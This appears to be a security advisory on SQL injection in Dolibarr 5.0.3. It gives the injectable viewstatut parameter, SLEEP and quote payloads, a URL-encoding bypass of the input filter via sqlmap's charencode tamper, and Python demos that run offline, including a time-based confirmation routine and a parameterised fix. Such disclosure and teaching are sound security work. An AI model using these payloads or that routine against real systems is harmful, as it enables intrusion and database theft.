|Affected Version(s)||5.0.3 and probably prior|
|Vulnerability Discovery||June 3, 2017|
|Vendor Notification||June 6, 2017|
|Advisory Publication||June 7, 2017 [without technical details]|
|Vendor Acknowledgment||June 18, 2017|
|Vendor Fix||Partially fixed as of 5.0.4|
|Public Disclosure||March 12, 2018|
|Latest Modification||March 12, 2018|
|Product Description||Dolibarr ERP/CRM is an open source, free software package for small and medium companies, foundations or freelancers. It includes different features for enterprise resource planning (ERP) and customer relationship management (CRM) but also other features for different activities.|
|Credits||Yann Chalençon, Security Researcher & Penetration Tester @wizlynx group|
|Multiple SQL Injection Vulnerabilities in Dolibarr|
|Severity: Medium||CVSS Score: 6.3||CWE-ID: CWE-89||Status: Partial Fix|
|The application Dolibarr is affected by multiple SQL injection vulnerabilities affecting version 5.0.3 and prior. These vulnerabilities could allow remote authenticated attackers to inject arbitrary SQL code.|
|CVSS Base Score|
|Attack Complexity||Low||Confidentiality Impact||Low|
|Privileges Required||Low||Integrity Impact||Low|
|User Interaction||None||Availability Impact||Low|
The Dolibarr web application, version 5.0.3, is vulnerable to SQL injection in multiple places. An authenticated user can inject arbitrary SQL statements into the affected queries, for example to dump the entire database.
In addition, the input filter Dolibarr uses to block SQL injection can be bypassed simply by URL-encoding the SQL payload. This bypass can be automated with sqlmap using the "charencode" tamper script.
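The bypass described above is easiest to see with a small model of the situation: a keyword blacklist applied to the request before URL-decoding, followed by a query built by string concatenation from the decoded value. The following is an added example written for this page, not Dolibarr's own filter or query code; the `propal` table, the `viewstatut` parameter and the blacklist pattern are assumptions chosen to mirror the request shown in the screenshots, and SQLite stands in for MySQL (so the keyword list, not `SLEEP()`, is what the database part exercises).

```python
import re
import sqlite3
from urllib.parse import parse_qs, quote

# Hypothetical keyword blacklist (not Dolibarr's real filter): it looks for
# dangerous SQL fragments in the request as received, i.e. still URL-encoded.
BLOCKED = re.compile(r"(sleep\s*\(|union\s+select|benchmark\s*\()", re.IGNORECASE)


def naive_filter_passes(raw_query_string: str) -> bool:
    """Return True if the *encoded* query string contains no blacklisted fragment."""
    return BLOCKED.search(raw_query_string) is None


def decoded_viewstatut(raw_query_string: str) -> str:
    """What the application actually sees once the query string is URL-decoded."""
    return parse_qs(raw_query_string).get("viewstatut", [""])[0]


def bypass_demo(payload: str) -> dict:
    """Show that encoding the payload defeats the blacklist without changing it."""
    plain = "viewstatut=" + payload
    encoded = "viewstatut=" + quote(payload, safe="")   # e.g. 0-SLEEP%281%29
    return {
        "plain_blocked": not naive_filter_passes(plain),
        "encoded_passes": naive_filter_passes(encoded),
        "value_seen_by_app": decoded_viewstatut(encoded),
    }


def make_db() -> sqlite3.Connection:
    """Constructed sample data standing in for the commercial-proposal table."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE propal (rowid INTEGER, ref TEXT, fk_statut INTEGER)")
    conn.executemany(
        "INSERT INTO propal VALUES (?, ?, ?)",
        [(1, "PR1701-0001", 0), (2, "PR1701-0002", 1), (3, "PR1701-0003", 2)],
    )
    return conn


def vulnerable_lookup(conn: sqlite3.Connection, viewstatut: str) -> list:
    """The injectable pattern: the decoded parameter is concatenated into SQL.
    A lone quote raises an SQL syntax error (as in the screenshot); a boolean
    payload such as "0 OR 1=1" returns every row."""
    sql = "SELECT rowid, ref FROM propal WHERE fk_statut = " + viewstatut
    return conn.execute(sql).fetchall()


def hardened_lookup(conn: sqlite3.Connection, viewstatut: str) -> list:
    """The fix: validate the type the parameter is supposed to have, then bind
    it as a query parameter so it can never be parsed as SQL."""
    if not re.fullmatch(r"-?\d+", viewstatut):
        raise ValueError("viewstatut must be an integer status code")
    return conn.execute(
        "SELECT rowid, ref FROM propal WHERE fk_statut = ?", (int(viewstatut),)
    ).fetchall()


if __name__ == "__main__":
    print(bypass_demo("0-SLEEP(1)"))
    conn = make_db()
    print(vulnerable_lookup(conn, "0 OR 1=1"))
    try:
        vulnerable_lookup(conn, "'")
    except sqlite3.OperationalError as e:
        print("SQL error:", e)
    print(hardened_lookup(conn, "1"))
```

The point of `bypass_demo` is that the blacklist and the database never see the same bytes: the filter inspects `SLEEP%281%29`, the query receives `SLEEP(1)`. Decoding before filtering closes that particular gap, but the only durable fix is the one in `hardened_lookup`: a type check plus a bound parameter, which is also what makes the `'` probe from the advisory harmless.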
The following screenshot shows the request sent when listing commercial proposals. To demonstrate the SQL injection, we entered a single quote character in the viewstatut parameter. This produced an SQL error, shown on the right side of the screenshot:
To confirm the injection, we then inserted MySQL "SLEEP" calls, which, if executed by the database, delay the response from the web server. The first screenshot shows the baseline request without SLEEP; as the bottom right corner shows, the response was returned in 56 milliseconds.
We then appended "-SLEEP(1)" and the response was returned in 4057 milliseconds.
We then appended "-SLEEP(2)" and the response was returned in 8059 milliseconds.
The delay grows linearly with the SLEEP argument, which rules out network jitter as an explanation. It is also roughly four times the requested sleep, which indicates that the injected expression is evaluated several times per request (for example once per matching row); this matters when tuning time-based blind extraction, since the effective delay per unit is larger than the value sent.
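The measurement procedure above (baseline, then increasing SLEEP values, then a check that the delay scales with the argument) can be scripted so that a finding is confirmed rather than eyeballed. The following is an added example for this page, not tooling from the advisory or from Dolibarr. The `send` callable is an assumption standing in for whatever issues the authenticated request; the `simulated_target` below is a constructed stand-in that mimics the observed behaviour (about four seconds of delay per SLEEP unit), scaled down so the example runs quickly offline.

```python
import re
import statistics
import time
from typing import Callable, Dict

# Constructed simulation of the behaviour seen in the advisory: the injected
# SLEEP(n) is evaluated about four times per request. SIM_UNIT scales one
# "second" of SLEEP down to 20 ms so the demo finishes quickly.
SIM_UNIT = 0.02
SIM_EVALUATIONS_PER_REQUEST = 4


def simulated_target(viewstatut: str) -> None:
    """Pretend web application whose database honours SLEEP(n) in viewstatut."""
    m = re.search(r"SLEEP\((\d+)\)", viewstatut, re.IGNORECASE)
    if m:
        time.sleep(int(m.group(1)) * SIM_EVALUATIONS_PER_REQUEST * SIM_UNIT)


def patched_target(viewstatut: str) -> None:
    """Pretend fixed application: the parameter never reaches the SQL parser."""
    return None


def measure(send: Callable[[str], None], payload: str, samples: int = 3) -> float:
    """Median wall-clock seconds for send(payload); the median damps outliers."""
    times = []
    for _ in range(samples):
        t0 = time.perf_counter()
        send(payload)
        times.append(time.perf_counter() - t0)
    return statistics.median(times)


def confirm_time_based(send: Callable[[str], None], base_value: str = "0",
                       min_delta: float = 0.5) -> Dict[str, object]:
    """Time-based confirmation modelled on the advisory's steps.

    Sends the baseline, then base-SLEEP(1) and base-SLEEP(2), and reports the
    finding as confirmed only if SLEEP(1) adds at least `min_delta` seconds over
    baseline and SLEEP(2) adds roughly twice as much (linear scaling). The
    per-unit factor is returned so extraction tooling can be tuned to it.
    """
    baseline = measure(send, base_value)
    d1 = measure(send, f"{base_value}-SLEEP(1)") - baseline
    d2 = measure(send, f"{base_value}-SLEEP(2)") - baseline
    significant = d1 >= min_delta
    linear = significant and 1.5 <= d2 / d1 <= 2.5
    return {
        "baseline_s": baseline,
        "delta_sleep1_s": d1,
        "delta_sleep2_s": d2,
        "seconds_per_sleep_unit": d1,        # ~4 in the advisory's measurements
        "vulnerable": bool(significant and linear),
    }


if __name__ == "__main__":
    # With a real target, min_delta of 0.5 s is a sensible floor; the simulation
    # uses a smaller one because its SLEEP unit is scaled down.
    print(confirm_time_based(simulated_target, min_delta=SIM_UNIT))
    print(confirm_time_based(patched_target, min_delta=SIM_UNIT))
```

Requiring linear scaling between SLEEP(1) and SLEEP(2) is the check that separates a real injection from a slow server: a single long response proves nothing, but a delay that doubles when the argument doubles is hard to explain any other way. The measured seconds-per-unit value is what you would feed into `sqlmap --time-sec` when moving on to extraction.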
Note: Most of these vulnerabilities were fixed in Dolibarr version 5.0.4. However, the viewstatut parameter is still vulnerable as of 7.0.0. The propal_statut parameter was renamed to search_statut in version 7.0.0 and is still vulnerable as well.